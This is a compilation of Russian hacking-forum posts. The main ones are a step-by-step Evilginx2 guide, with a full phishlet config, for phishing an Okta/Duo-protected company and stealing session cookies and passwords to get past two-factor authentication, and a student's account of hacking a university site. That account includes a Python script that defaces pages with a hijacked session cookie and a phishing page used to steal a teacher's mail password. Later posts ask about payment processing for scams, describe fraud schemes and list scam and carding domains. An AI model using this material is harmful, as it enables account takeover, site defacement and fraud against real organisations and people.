Бывают случаи, когда тебе нужно кого-то зафишить. Бывает, когда у целевой организации настроен второй фактор для аутентификации — sms, Google authenticator, Duo. Что делать в таких случаях? Нанимать гопников? Подрезать телефоны у сотрудников? Нет! Оказывается, хитрые хакеры написали софт, способный помочь в этой непростой ситуации.
Evilginx2 — фреймворк для фишинга, работающий как прокси между жертвой и сайтом, учетки от которого мы хотим получить. Раньше он использовал кастомный nginx, теперь же полностью переписан на Go, включает в себя мини HTTP и DNS серверы, что сильно облегчает установку и развертывание.
Как это работает? Автор софта подробно [описал](https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa- tokens/) на своем сайте, детали по установке и настройке можно найти на github странице проекта. Почему же удается обойти второй фактор? Фишка в том, что мы не вмешиваемся в процесс ввода кода из смс / временного пароля / пуша от DUO. Мы тихо ждем, пока пользователь успешно пройдет все шаги аутентификации, ловим его куку, и уже ее используем для входа. Попутно на всякий случай собираем его логин и пароль. В этой же заметке я расскажу о своем опыте и подводных камнях, с которыми столкнулся.
Задача
Итак, нам нужно зафишить контору, которая активно использует Okta как Single Sign-on. В качестве второго фактора используется Duo — решение, фишка которого в мобильном клиенте, позволяющем подтверждать второй фактор через обычные пуш-нотификации вместо ввода 35-значных кодов (привет Google Authenticator). Приступим.
Шаг первый — регистрируем фишинговый домен
В панели нашего провайдера указываем адрес сервера, на котором будет расположен фишинг. Также регистрируем поддомен вида okta.<фишинговый домен>.com.
Шаг второй — настраиваем Evilginx
Запускаем Evilginx и через команду config вводим необходимые настройки. Указываем основной домен (не поддомен) и его IP.
Code:Copy to clipboard
config domain <фишинговый домен>.com
config ip 10.0.0.1
В итоге конфиг выглядит так:
Интересен тут параметр redirect_url — он указывает куда перенаправлять запрос, когда клиент пришел в корень нашего домена. Зачем это сделано? Если отдавать фишинговую страницу из корня, домен очень быстро вычислят и внесут в списки опасных сайтов, браузеры будут грозно ругаться, и пользователи никогда к нам не попадут. Поэтому мы ее будем отдавать по уникальной ссылке, а корень будет перенаправлять на песню Never Gonna Give You Up.
Шаг третий — настраиваем фишинговую страницу
Тут начинается самое интересное. Так как по-факту на нашем сервере мы вообще не хостим никакого контента, а только проксируем запросы, нам нужно "рассказать" Evilginx, какие именно данные мы хотим получить. Этот "рассказ" мы пишем в специальном формате. Документация по нему доступна на [wiki](https://github.com/kgretzky/evilginx2/wiki/Phishlet-File- Format-(2.2.0)) странице проекта. Называются эти описания phishlets. Для некоторых популярных сервисов — facebook, linkedin, amazon они уже написаны и включены в дистрибутив. Нам повезло меньше, из коробки Okta не поддерживается, но добрые люди написали phishlet для старой версии. Берем напильник и начинаем паять.
Заполняем описание, указываем имя phishlet, авторов, и требуемую версию Evilginx.
Code:Copy to clipboard
name: 'okta'
author: '@ml_siegel, updated by @hollow1'
min_ver: '2.2.0'
Указываем, какой именно домен собираемся фишить. В нашем случае используется домен вида <имя целевой компании>.okta.com
Code:Copy to clipboard
proxy_hosts:
- {phish_sub: '', orig_sub: '<поддомен имя целевой компании>', domain: 'okta.com', session: true, is_landing: true}
Параметр session указывает на то, что именно этот домен отдает нужные нам куки и туда передаются учетные данные, is_landing значит что этот хост будет использоваться для генерации фишинговых URL.
Следующий важный этап — определить все запросы к целевому домену, для того чтобы прокси успешно их переписала на фишинговый домен. Если этого не сделать, пользователь будет отправлять данные не нам, а сразу на оригинальный домен, и никаких учеток мы не поймаем. Переписывать нужно только те запросы, которые непосредственно участвуют в процессе входа пользователя на сайт.
Чтобы четко понимать, что именно требуется для успешной аутентификации, нужно внимательно этот самый процесс изучить. Вооружившись Burp и тестовой учеткой начинаем искать как передается пароль и по каким кукам приложение определяет авторизованного пользователя. Также ищем ответы от сервера, в которых есть ссылки на оригинальный домен.
Находим запрос, в котором передается логин и пароль. Видим что он шлется на оригинальный домен, а нужно чтобы уходил нам.
Вот здесь видно, как оригинальный домен отдает ссылки внутри javascript, их нужно переписать.
Собрав это и еще пару запросов получаем следующие настройки:
Code:Copy to clipboard
sub_filters:
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '<целевой домен>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
- {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2F<целевой домен>.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
Ключевое слово {hostname} как раз используется для замены оригинального домена на фишинговый. Подробнее о синтаксисе этой секции написано [тут](https://github.com/kgretzky/evilginx2/wiki/Phishlet-File- Format-(2.2.0)#sub_filters).
Помните, нам нужны куки, с которыми мы будем авторизоваться на сайте. Путем проб и ошибок выясняем имя куки — sid , и дописываем его в настройки:
Code:Copy to clipboard
auth_tokens:
- domain: '<целевой домен>.okta.com'
keys: ['sid']
Также нам пригодится логин и пароль пользователя, мы уже нашли запрос, в котором они передаются. Как видно в запросе, нужные нам параметры username и password передаются в json, дописываем:
Code:Copy to clipboard
credentials:
username:
key: 'username'
search: '"username":"([^"]*)'
type: 'json'
password:
key: 'password'
search: '"password":"([^"]*)'
type: 'json'
Так Evilginx сможет вычленять их из запросов и корректно сохранять.
Осталось немного. Укажем URL страницы логина на целевом домене.
Code:Copy to clipboard
landing_path:
- '/login/login.htm'
Укажем URL, по которому мы поймем, что пользователь успешно авторизован.
Code:Copy to clipboard
auth_urls:
- 'app/UserHome'
Вот и все! Конфиг целиком:
Code:Copy to clipboard
name: 'okta'
author: '@ml_siegel, updated by @hollow1'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: '', orig_sub: '<поддомен имя целевой компании>'', domain: 'okta.com', session: true, is_landing: true}
sub_filters:
sub_filters:
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '<целевой домен>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
- {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
- {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2F<целевой домен>.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
- domain: '<целевой подомен>.okta.com'
keys: ['sid']
credentials:
username:
key: 'username'
search: '"username":"([^"]*)'
type: 'json'
password:
key: 'password'
search: '"password":"([^"]*)'
type: 'json'
landing_path:
- '/login/login.htm'
auth_urls:
- 'app/UserHome'
Сохраняем его как okta.yaml в /usr/share/evilginx/phishlets.
Шаг четвертый — включаем наш новый фишинг
Запускаем evilginx и пишем команду
phishlets hostname okta okta.<наш фишинговый домен>.com
Click to expand...
Включаем phishlet
phishlets enable okta
Click to expand...
Под него автоматически создается сертификат от LetsEncrypt.
Проверяем настройки:
Указываем, куда будем редиректить пользователя после успешной авторизации
phishlets get-url okta https://<целевой домен>.okta.com/
Click to expand...
Приложение выдаст ссылку, которую нужно рассылать пользователям, вида https://<фишинговый домен>.com/login/login.htm?rb=9ffe&ec=<уникальный хеш>
Шаг 4 — ждем улов
Рассылаем письма (технологии рассылки — материал для отдельной статьи) и ждем.
Неокрепший доверчивый пользователь идет по ссылке и авторизуется.
Все пойманные учетки складываются в sessions. Выбираем нужную и копируем из нее куки:
Открываем бразуер, подставляем куки и вуаля — мы внутри!
Послесловие
Evilginx сильно упрощает создание фишинговых страниц, особенно для 2FA. Также эти страницы удобно хранить и делиться ими с друзьями. Способы защиты — использование девайсов стандарта U2F, переход на новые методы аутентификации.
Что думаете об описанном подходе? Как собираете учетки вы?
Оригинал статьи тут
Добавлю от себя. Оттестил, и это сука работает!
Всем удачи! :smile8:
Что будет если не отдать кредит на ВМ?
У меня встал вопрос. Подскажите есть ли какое-то приложение для удаленного
управления android "из коробки"? Без включения рут прав или отладки по USB.
Подходит любое решение типа тимки, энидеска, эйрдроида и прочих, но во всех
вышеупомянутых софтинах именно для управления, а не просто демонстрации
экрана, нужно либо включать рут права, либо подключать девайс к ПК, запускать
отладку по USB и тд, что максимально мешает. Если есть такое же решение под
iOS будет вдвойне шикарно (сильно много хочу, знаю).
Тапками не кидаемся, если не увидел решение у себя под носом. Спасибо.
P.S. дополню описание тем, что нужен не скрытое управление или бот, достаточно вполне легальной софтины, которую человек сознательно устанавливает.
Не уверен что создал тему в нужном разделе. Просьба к АГ перенести, а не удалять, если что
Добрый день, уважаемые форумчане. То что вы сейчас прочтете, возможно будет похоже на какой-то художественный фильм про хакинг пентагона, но это реальная история, которая случилась со мной совсем недавно.
С чего всё начиналось
По календарю ноябрь провожал мой нелегкий первый год в университете. Зачеты, экзамены, сессии, казалось до них было далеко, но, однокурсники с каждым днем стали чаще напоминать мне об этой суете, так как, баллы у меня были самые низкие (кроме информатики ). Официальный сайт нашего университета почти не был защищен: небезопасный протокол HTTP, куча SQL инъекций и XSS. С помощью одной из этих уязвимостей, мне потребовалось 10 минут для взлома сайта. А точнее, это была очередная SQL инъекция, которая позволила мне получить все данные для входа в панель управления. Пароли не были зашифрованные, из-за чего моя задача облегчалась в несколько раз. Зашел на панель, посмотрел что-там, и понял что там можно изменить инфу только с этого домена. К моему сожалению, там и речи не было о БРС (балльно рейтинговая система), так как он находился на поддомене, и к моему удивлению, имел совсем другой IP адрес. Мое незнание сети привело меня к выводу, что сеть университета немного запутана, и чтобы получить доступ к БРС, придется действовать другим методом. Конечно же, я не мог просто оставить взломанный сайт без изменений, и вместо того чтобы вручную менять каждую публикацию, я внимательно посмотрел все параметры которые передаются по POST запросу, и написал питон скрипт, который раз за разом отправлял POST запросы на все адреса, которые нужны были для изменения публикаций. Если расписывать каждый шаг, получится очень много теории, поэтому приведу вам видео-ролик, который я записал в ночь взлома.
И так. Для того чтобы менять какую-то публикацию, естественно нужно было войти на панель управления. Но, на входе меня ожидала одна проблема - капча, которую я так и не смог решить. После нескольких неудачных попыток, пришло в голову сделать это совсем по другому. Как вы знаете, при смене кукисов на валидные, мы без каких-либо вводов паролей и решений капч, могли оказаться в панели. Именно так я и сделал, благодаря параметру cookies из нашего любимой библиотеки requests, которая указывалась при отправке запроса. Запустив скрипт и указав валидную PHPSESSID, начиналось шоу. Приведу немного измененный пример кода, дабы избавиться от некоторых вопросов
Python:Copy to clipboard
import requests
import os
import sys
import time
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
print("Secret key:")
sessid = input()
time.sleep(1)
print(color.BOLD + "Successfully key confirmation! \n" + color.END)
time.sleep(2)
print("Sending requests...\n")
time.sleep(3)
s = requests.Session()
urls = ["http://site.ru/edit1.php?id=", "http://site.ru/edit2.php?id=",, "http://site.ru/edit3.php?id=", "http://site.ru/edit4.php?id=", "http://site.ru/edit5.php?id="]
cookies = {'PHPSESSID': sessid, 'ckCsrfToken' : '29iurhXaHn4B80ED9466L85OooV6fyo1wL7K850p'}
date = "2019-07-07"
text = """
<html> <h1 align="center">HACKED BY VASYA PUPKIN</html>
"""
title = "HACKED"
pre_text = "HACKED"
files = {
'userfile': (os.getcwd()+'/main.png', open(os.getcwd()+'/main.png', 'rb'), 'image/png')
}
link = "https://www.whoismrrobot.com/"
other = "СоÑÑаниÑÑ Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ"
for num in range(0,4):
for i in range(0,300):
r = s.post(urls[num]+str(i), files=files, cookies = cookies, data={'title' : title, 'text' : text, 'date' : date, 'pre-text' : pre_text, 'do_edit' : other, 'date_end' : date, 'category' : 6, 'link' : link})
print(color.BOLD +"Publication with ID " + str(i) + " defaced!" + color.END)
time.sleep(0.05)
end = """
████████████████████████████████████
█─██─██────██────██─██─██───██────██
█─██─██─██─██─██─██─█─███─████─██──█
█────██────██─█████──████───██─██──█
█─██─██─██─██─██─██─█─███─████─██──█
█─██─██─██─██────██─██─██───██────██
████████████████████████████████████
██████████████
█────███──█──█
█─██──███───██
█────█████─███
█─██──████─███
█────█████─███
██████████─███
████████████████████████████████████
█────██──█──██────██───██────██────█
█─██─███───█████──████─██─██─██─██─█
█─██─████─█████──███───██────██─██─█
█─██─███───███──██████─██─█─███─██─█
█────██──█──██────██───██─█─███────█
████████████████████████████████████
"""
print(end)
Те, кто знает хотя бы базу питона, поймут что для чего. Почему хотя бы? Да потому-что я сам знаю не больше xD.
Идем к большой цели маленькими шагами
Сайт взломан, видео залито, слухи ходят. Казалось бы, цель достигнута, но, наш злорадствующий смех, говорит, что это была всего лишь разминка. Итак, сканировав поддомен БРС на наличие уязвимостей, как автоматическим, так и ручным способом, я пришел к выводу, что эта часть сайта хорошо защищена. Несмотря на это, я всё верил что разработчики допустили хоть какую-то мелочь, и стал прочесывать сайт с помощью Dirb. К нашему сожалению, это не дало никакого результата. Но, я все равно не хотел сдаваться. Думаю и так понятно, что у каждого преподавателя есть отдельный аккаунт в БРС. Поэтому, нам нужно было получить доступ сразу к нескольким аккаунтам в БРС, или, буду честен, к аккаунтам преподавателей, которые ставят мне слишком низкие баллы xD. Буквально у всех, были айфоны. А мы знаем, что яблоко не подпускает к себе любых недобрых приложений. Поэтому, достичь цели с помощью запуска вируса на телефоне, было вычтено из списка вариантов. И тут я вспомнил про любимую СИ (Социальная инженерия). Слишком много текста, чувствуете? Ничего, это того стоит. Данные для входа в БРС каждому преподавателю отправляли на почту индивидуально. Я не стал много раздумывать, и пошел сделать фишинг-страницу, похожую на страницу входа mail.ru. Получилось что-то подобное
После нажатия кнопки Войти, данные отправлялись нам, а пользователя направляло на главную страницу почты. В прикрепленных файлах оставлю исходники кода, может кто захочет повторить трюк. Немного изменив свой почтовый ящик под аккаунт Администрации, я пошел писать письмо. В этом мне очень помог всеми известный хабр (не реклама). В итоге, у меня получилось вот это
Ссылка "Подтвердить" отправляла нас на нашу фишинг страницу. Адрес был
примерно следующим: http://myhost.ru/?emai=prepod7@mail.ru
В index.php нашей страницы, я сделал так, чтобы значение из GET параметра
email сохранялось в сессии, так, чтобы при обновлении страницы все равно
отображался первоначальный email. Сделано было это для красоты. Итак, всё
готово, осталось ждать пока жертва клюнет. Я подключился к серверу по SSH и
стал слушать файл лога с помощью команды tail -f data.txt
и пошел спать.
Просыпаюсь утром, увидев что лог пуст, я с грустью пошел готовиться к универу.
Буквально через 30 минут, я вернулся чтобы посмотреть, не случилось ли чудо.
Эххх, вы бы видели мое лицо, когда мой терминал выдал мне логин и пароль для
входа в почту преподавателя. Радости не было конца. То ли преподаватель совсем
не был знаком с ИБ, то ли не выспался, но я получил пароль. До начала занятий
был минимум час, и это позволило мне копать почту. Кол-во писем было там,
3000+, если не больше. У меня бы ушли возможно дни, если б искал нужное письмо
в ручную. Благо, кому-то пришло в голову сделать автоматический поиск писем,
чем я и воспользовался. Немного пролистав ключевые письма, я нашел именно то
письмо, где сообщались данные для входа в БРС. Это была победа.
P.S. Прошу строго не судить, всё было написано и сделано на собственных понятиях. Если где-то допустил ошибку, буду только рад исправлению.
Всем спасибо за внимание!
Давно сижу в чатах спамеров, всем извесно что они льют на серые офферы, и в
этих чатах часто поднимался один и тот же вопрос - "а почему бы нам не поднять
свой приватный оффер?" и всегда эта инициатива упиралась в платежную систему.
Собственно сам вопрос: как можно подключить платежку по картам на свой
лохотрон, без услуг агрегатора который забанит после 2-х жалоб, да так чтобы
она не отваливалась и опять же чтобы ее не заблокировали?
В данном случае вопрос распространяется не только на СЕРЫЕ офферы, но на
вообще любые лохотроны.
http://habrahabr.ru/blogs/infosecurity/68131/
и как их за жопу не берут?
Новый спам:
ППривеет! помоги выиграть ноутбук. Конкурс Party Fire 2009. Отправь
за меня смску с текстом id16111175 на номер 2090. Она стоит 7рублей.
Я уже на 2м месте)))))) Помоги плз... заранее огромное спасибо. Я в
долгу не останусь!Click to expand...
Не попадайтесь чел накручивает рейтинг в контакте, думаю уже через пару дней его акк будет заблокирован
**1. "Ошибки" в платежных системах. **
Это распространенный вид "халявы" и состоит в том, что жертве сообщают о том,
что в некоей платежной системе X обнаружена уязвимость, позволяющая извлекать
прибыль. Далее идет описание сути уязвимости и предлагается рецепт заработка,
состоящий как правило в отправке некоторой суммы денег на "магический" кошелек
с сопутствующими шаманскими действиями. Обещается, что после перевода через
некоторое время деньги вернутся в удвоенном (утроенном ...) виде
Реальность: "магический" кошелек принадлежит мошенникам и после перевода на
него денег естественно ничего обратно не вернется. И пожаловаться пострадавший
не сможет (представьте заявление в милицию "я пытался взломать платежную
систему и в результате лишился денег"
2. Утилиты для взлома платежных систем.
Жертве предлагается некоторый генератор номеров кредитных карт, систему для
скрытного списания денег с чужих счетов/кошельков и т.п. Ключевой момент - для
работы этого генератора необходимо ввести номер своей карты/кошелька и пароль.
Часто такие программы идут с детальной справкой и может быть описано, что
программа платная и бесплатно можно "взломать" только 1-3 счета
Реальность: введенные данные передаются злоумышленникам и жертва теряет то,
что было на счете или в электронном кошельке
3. Генераторы кодов карт систем оплаты сотовой связи или Интернет.
Идея аналогична п.п. 2, но в "генератор кодов" предлагается ввести код
неактивированной карты, который послужит своего рода образцом для
"размножения". Часто такие программы идут с детальной справкой и может быть
описано, что программа платная и бесплатно можно "взломать" только 1-3 карты
оплаты
Реальность: введенные данные передаются злоумышленникам, а программа
начинает имитировать бурный процесс вычислений. Идея обмана - нужно ввести код
неактивированной карты. Получивший его злоумышленник активирует карту и
потерпевшие собственно оказывается в дураках
4. Системы заработка на основе просмотра некоторой рекламы. Идея метода -
пользователю предлагается
4.1 Установить программу X, которая будет отображать рекламу, за просмотр
которой пользовал будет получать некоторые деньги
4.2 Держать открытой некую страницу, на которой крутится рекламная информация
4.3 Ходить по каким-то страницам с рекламой и "собирать бонусы"
Обычно пользователю предлагаются золотые горы и заработок в сотни баксов в
месяц
Часто пользователю предлагается некая партнерская программа, предполагающая
получение денег из прибыли партнеров и (или) бонусов за их регистрацию
Реальность: Обычно в всех таких систем есть некий минимальный порог
(например, 30-50$) для снятия денег. А насобирать эти самые деньги весьма
сложно - долго собирать придется, так как за факт просмотра платится очень
небольшая копеечка. Обычно любитель халявы регистрируется, возится с этой
штукой некоторое время и потом плюет (время между регистрацией и плевание - по
статистике от часа до недели). А снять заработанные за это время центы (или
даже доллары) он не может... Т.е. в итоге он смотрит рекламу даром . А если
трафик не безлимитный и вычислить его стоимость, то окажется, что вместо
прибыли данная штука приносит убыток. Кроме того, в корпоративной среде
постоянные обращения служебного ПК в Интернет могут заинтересовать службу
безопасности со всеми вытекающими для пользователя последствиями.
5. Партнерская программа систем заработка на основе просмотра некоторой
рекламы.
Идея метода - п.п. 4 + партнерская программа, предполагающая некоторые бонусы
за привлечение рефераллов и процент от их заработка
Реальность: Чтобы от нее получить некоторую прибыль, нужно активно
изыскивать рефераллов - получается принцип пирамиды. Обычно желающий стать
миллионером любитель халявы ведет очень агрессивный поиск рефераллов -
распихивает во все доступные конференции/блоки/гостевые книги описания "метода
легкого заработка", создает на бесплатных хостингах кучу страниц под рубрикой
"халява", рассылает спам с красочным описанием методики и т.п. Общий признак -
дается не просто ссылка на систему такового заработка, а ссылка с партнерским
ID. Понятно дело, что заработать что-то может некто, находящийся наверху
пирамиды
6. "Секретные материалы".
Суть метода - пользователю предлагается купить некое руководство, материалы
которого помогут ему бесплатно пользоваться мобильной связью, электроэнергией,
получить халявный Интернет и т.п. - корочего говоря, содержит "инструкции по
получению халявы".
Реальность: Если таковое руководство и существует в реальности, то имеющиеся
там "рецепты" как правило давно и бесплатно находятся в Интернет. Более того,
работоспособность подобных методик весьма сомнительна, а пожаловаться
пользователь естественно никому не может
Источник: virusinfo
на этих сайтах обитают "нехорошие" личности. =)
100ballov.ru
101-101-3.ru
18baksmobile.nm.ru
21er.ru
2-ru.net
495.isgreat.tv
4card.net
50percents.com
5days.ru
62033.net.ru
62033.ru
a-diplom.com
adnet.ru
alcor-mobile.ru
aleand.by.ru
alexlabutin.narod.ru
alkor-digital.com
alkor-m.com
alkorshop.com
all-laptops.com
allmoneyback.com
alom.ru
altprom.su
amro.boom.ru
amv.boom.ru
angelfire.com/amiga2/coolgoods
apparatura.net
aqueena.info
arpcheap.com
asartwin.narod.ru
atestats.narod.ru
attestat.net
autoprava.info
autoremont.su
avk-3.greenline.ru
axtech.net
bandesign.ru
bankforex.com
bankforex.ru
baza.5gigs.com
bb-co.narod.ru
beeconverter.narod.ru
beegen.nm.ru
beeline5.h15.ru
bestdiplom.ru
bestelefon.narod.ru
bestmobil.com
betmarket.tut.ru
bets-search.nm.ru
bezagentov.narod.ru
bezlimitka.com
bigprocent.tk
bis.s5.com
bis.s5.com
bisness-rospr.narod.ru
bizbiz.narod.ru
bizgarant.ru
biznesgarant.ru
boardmaster.ru
bobofon.ru
booster100.ru
bptipr.com
bptipr.ru
bumagi.com
buyphones.org.ru
call-free.org
cardermobile.org
carderproduct.biz.ly
carderproduct.com
carderproduct.net
carderproduct.org
carderproduct.wagoo.com
carders.h15.ru
carders.siteburg.com
carders0.hostonfly.ru
cardersota.org
carder-shop.nm.ru
carder-stock.com
carder-stock.fatal.ru
cardgoods.com
carding.bravehost.com
carding.fromru.com
cardingservice.nxt.ru
cardingshop.land.ru
card-market.biz
card-market.biz
card-s.nm.ru
cardzzz.biz
cc-goods.net
ccshop.biz
ccshop.pbnet.ru
cctovar.com
cc-world.ws
cd-opt.ru
cdstalker.ru
ceziy-gsm.narod.ru
ch31.narod.ru
change-investing.com
cheapshop.ru
chemistry.nm.ru
clx.ru
commandos.coolwebprofits.com
conf-gsm.narod.ru
confis.jino-net.ru
confiscat2006.narod.ru
confiscatsellout.com
conntmn.narod.ru
coolwebprofits.com
creditgoods.com
cvv.ru
cvv2.ru
cyberdengi.biz
cyberdengi.com
cyberjob.us
cycle-profitm.narod.ru
datacable.ru
departament.ru
deshevo.biz
deshevo.boom.ru
dettrax.narod.ru
devochki.ru
dgun.ru diamondprofit.com
digitalphone.ru
digitron.ru
dip4sale.chat.ru
diplom.net.ru
diplom.pp.ru
diplomic.ru
diplomov.net
diplomov.ru
diplomru.ru
diploms.net
diplomsss.chat.ru
diplomy.com
dipo.ru
doconline.ru
doc-rf.narod.ru
dokfactory.com
dokument.hut2.ru
dokumentov.net
dolche-mobile.ru
domohost.ru
dostavkalinz.ru
dostupno.com
dsl-market.net
e38.250free.com
e38.biz
e38pts.boxmail.biz
easy-mob.com
ecommtools.com
edollarhyip.com
eg2003.narod.ru
eg-2003.narod.ru
ege.by.ru
ege.com.ru
ege.net.ru
ege03.narod.ru
ege2003.h10.ru
ege5.narod.ru
egelen.narod.ru
egetest.by.ru
e-goldsbors.narod.ru
eicorporation.com
ekzamen.by.ru
enigma-samara.nm.ru
eon.xost.ru
e-pay.com.ru
epay-center.com
eservis.ru
e-shop2.narod.ru
espera.ru
eurocarding.com
eurokonf.com
euronetforex.com
european-nation.org
europromexport.com
eurotexno.com
evrophone.narod.ru
evroznak-dokument.narod.ru
examen-russia.com
examine.h1.ru
exem.ru
fcicorpru.com
fexa.net
ff-bank.net
finbetting.info
flamingo.ru
fond.yard.ru
foreign-fund.com
forexmasterbank.com
forexstock.org
forexwebmoney.com
free-calls.org
freegoods.sbn.bz
free-gsm.org
freegsm.ru
free-gsm-call.net
freegsmcalls.com
free-gsm-calls.net
free-gsm-calls.org
free-mob.com
free-mob.com.ru
free-mobil.nm.ru
freemobilephone.mail15.com
freeport.nm.ru
freesota.com
freesota.net
freesota.org
freesota.ru
freesotik.com
freetechgoods.net
from-usa.net
fsbinfo.com
fsbru.250free.com
fsbzakaz.narod.ru
ftf.com
ftf.ru
fxbt.com
geocities.com/callsforfree
gift.newmail.ru
giftomania.ru
giza777.narod.ru
gold-club-international.com
gold-timer.com
good-living.biz
goods4rus.net
gorcom.com/e
gprsmanager.narod.ru
gsm4all.boom.ru
gsmfree.org
gsmfreeonline.com
gsm-hack.com
gsm-hack.org
gsmkonfiskat.narod.ru
gsm-pcs.com
gsm-service.net
gsmsoft.net.ru
gsm-unlimited.narod.ru
hackmoney.narod.ru
hcenter.ru hifigold.com
hokonov.ru
home-work.ru
hous.h12.ru
icezone.ru
icqsale.info
icquin.ruserv.com
i-fb.biz
ifcgroup.ru
ifg-electro.i8.com
iifa.com.ua/invest
impound.biz
impound.org
incomtech.biz
individualka.org
informer45622tld.biz
informs.land.ru
intechnology.h14.ru
intelec4sale.com
intellix.us
intercat.biz/lg.php
internet-magazin.tv
investor2004.ru
investwm.com
investwm.s5.com
ip-host.biz
istart.ru/~freenet
iweb.nm.ru
iz-usa.com
job-career.com.ru
joboffers.narod.ru
kandidatnauk.ru
kard-shop.narod.ru
ke011.narod.ru
kompstarting.narod.ru
komptest.narod.ru
konfiskat.de
konfiskat.org
konfiskat.plazoo.ru
konfiskat.us
konfismarket.ru
konfmobile.h12.ru
konf-shop.com
konftech.com
konftech.org
konfuru.com
kredoline.com
kupitovar.com
kurkon.tripod.com
kvgscomp.com
laptopsdk.com
lekarstva.kiev.ua
leonmobile.hut1.ru
liderdvd.com
link.ru
lohuy.narod.ru
losena.ru
lotto.hotmail.ru
ltd-computers.com
mail-service.ru
malo.pp.ru
mansclub.ru
mashka-kakashka.front.ru
maxsale.tk
megacell.ru
megafaza.ru
megashop.100free.com
mega-trade.org
mepc.ru
merrydating.com
metalolom.narod.ru
mfkp.ru
minardi.com.ua
minisite.coolwebprofits.com
mmorpg-shop.net
mms.atspace.org
mobbix.ru
mobile15.nm.ru
mobile500.ru
mobile-angel.ru
mobile-card.narod.ru
mobilee.netfirms.com
mobilekonfiskat.narod.ru
mobilenium.ru
mobilesfree.100free.com
mobiletel.org
mobileyour.pud.ru
mobilinks.ru
mobilnik.net
mobilnik.org
mobilniki.nm.ru
mobiloff.nm.ru
mobilok.nxt.ru
mobilstar-phone.boom.ru
mobitel.h16.ru
mobshop.nm.ru
money4money.boom.ru
moneyback.ru
moscowgsm.ru
multibalans.narod.ru
mvdmvd.250free.com
mvp-fond.com
mxhost.ru
mytelefon2005.narod.ru
nadom.ru
natla.net
new.dem.ru
new-id.ru
nextworld.ru
nikolailoginov.by.ru
nocs.us
nomeravto.ru
nosoldat.ru
nst-phone.boom.ru
obuchen.com
officemob.com
officemobile.net
ofxgroup.com
okdiplom.com
one.diplom.com
onlineccshop.com
optmobile.100free.com ostorozhno.ru
otsobstvennika.ru
otvet4.narod.ru
otvetest.hostmos.ru
otvet-na-ege.narod.ru
palmShop.ru
partnerss.net
perlmasterbank.com
perspektiva.org
petrescue.us
pfgforex.org
phone-mobilee.narod.ru
pifond.com
pirama.com
piraty.ru
plasmamoscow.com
popover.coolwebprofits.com
pregradnet.narod.ru
prodazha-05.narod.ru
profitteam.vip.su
promo-soft.nm.ru
proshivka.com
proshivki.net
ptsmske38.boxmail.biz
quantus.biz
raciyaonline.ru
realege.narod.ru
real-invest.biz
red-and-white.8k.com
registege2003.narod.ru
renersion.narod.ru
ru2narod.ru
ru2usa.com
ru4ru.com
ru-market.com
rushop.biz
ru-shop.biz
ru-shop.com
rusrus2006.narod.ru
russchool.by.ru
russiancasino.ru
rustest2004.narod.ru
s0m3.ru
salegoods.sbn.bz
santehnika7.ru
school-108.narod.ru
schoolexam2003.narod.ru
scoters.nm.ru
sekretovnet.narod.ru
serialdvd.ru
sgshop.sbn.bz
shop.totalmetal.ru
shopcardcom.22.com1.ru
shopgoods.us
shopmobiles.ru
shopservicecc.com
shpion.boom.ru
simfimarket.info
smal.ru
smartresponder.ru
smegashop.narod.ru
sng.iaadriver.com
soch2003.anort.com
softcabel.ru
softwerk.ru
sonyericsson.su
sos-child.com
sotov-aver.narod.ru
sotovik.tk
specsoft.info
sportfarm.spb.ru
sportsarbitrageinvestor.com
sports-investments.org
sportspointer.com
stockservice.biz
strannix.com
surfjunky.com
telefoncik.ru
tele-fonia.narod.ru
telefors.narod.ru
telekonfiskat.narod.ru
territ0riya.tk
test2003.dtn.ru
test2003.ru
testirovanie.ru
teztour.ru
ti-nation.com
tnd.ru
toehelp.ru
tovarcc.nm.ru
tovaros.ru
tovarzadengi.narod.ru
tovarzawm.com
tovarzawm.com.ru
tovarzawm.h15.ru
tovcity.com
tovop.com
tradesoft.com.ru
trinixmob.narod.ru
tripledddea.us
trode.land.ru/1.htm
ultrahoster.com
ultraprofit.org
uniby.ru
unlockedmobile.ru
uraldesign.ru
usa2ru.biz
usa2ru.com
usa-ru.com
usatovar.com
uxxicom.com
vcd.bxhost.com
verloni25.narod.ru
vipgsm.com
vipgsm.ru
vipinvestclub.com
viplady.ru
viptexnika.com
volny.cz
volonter.h14.ru
vortov.com v-shop.cjb.net
vzlom.us
waitmobile.com
warsmith.ru
washingtonuniversity.us
webbank-wm.com
webcvant.ru
webdepo.ru
webgoods.biz
webit.ru
webmoneyinvest.com
